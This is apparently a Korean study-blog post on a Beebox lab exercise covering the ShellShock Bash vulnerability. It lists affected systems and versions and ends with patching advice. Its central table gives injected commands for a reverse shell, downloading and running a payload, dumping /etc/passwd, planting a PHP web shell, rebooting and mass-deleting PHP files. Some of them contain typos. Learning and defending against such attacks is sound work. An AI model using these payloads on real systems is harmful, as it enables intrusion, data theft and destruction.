- 2014년 9월 24일 스테판 챠젤라스(Stephane chazelas)에 의해 GNU Bash 공개
- 공격 범위 : MAC OSX, Android, OpenBSD, DHCP Client, SSH Server, CGI나 Apache를 사용하는 웹서버, 공유기 등
- 영향을 받는 버전 : GNU Bash 4.3 및 이전 버전
공격 | 삽입 명령어 |
리버스 셸 연결 | /bin/bash -i /dev/tcp/loclhost/8081 0>&1 |
악성파일 다운 | wget -O /tmp/syslogd http://localhost/prog; chmod 777 /tmp/syslogd; /tmp/syslogd; |
시스템 상태 체크 | /bin/ping -c localhost |
계정 탈취 | /bin/cat /etc/passwd > dumped_file |
웹 셸 생성 | echo "<? \\$cmd = \\$_REQUEST[\\\"cmd\\\"]; if(\\$cmd != \\\"\\\") print shell_exec(\\$cmd;?>\" > ../../p.php |
시스템 재시작 | /bin/bash -c \"reboot\" |
PHP 소스 삭제 | find / -name *.php | xargs rm -rf |
연결 후 버프스위트 수정한 값으로 Send한다.
ShellShock 취약점에서 가장 중요한 방어 방법은 패치 적용으로 시스템을 최신 상태로 유지하는 것이다. 취약한 Bash 버전을 최신 버전으로 업데이트한다.
'Study records > Web hacking' 카테고리의 다른 글
[Beebox] 검증되지 않은 리다이렉트와 포워드 (0) | 2024.07.31 |
---|---|
[Beebox] Buffer Overflow(Local) (0) | 2024.07.26 |
[Beebox] PHP CGI RemoteExecution(CVE-2012-1823) (0) | 2024.07.25 |
[Beebox] 크로스 사이트 요청 변조(비밀번호 변경/비밀번호 힌트 변경/계좌 이체) (0) | 2024.07.25 |
[Beebox] 기능 수준의 접근 통제 누락(디바이스 접근 제한/서버 측 요청 변조) (0) | 2024.07.24 |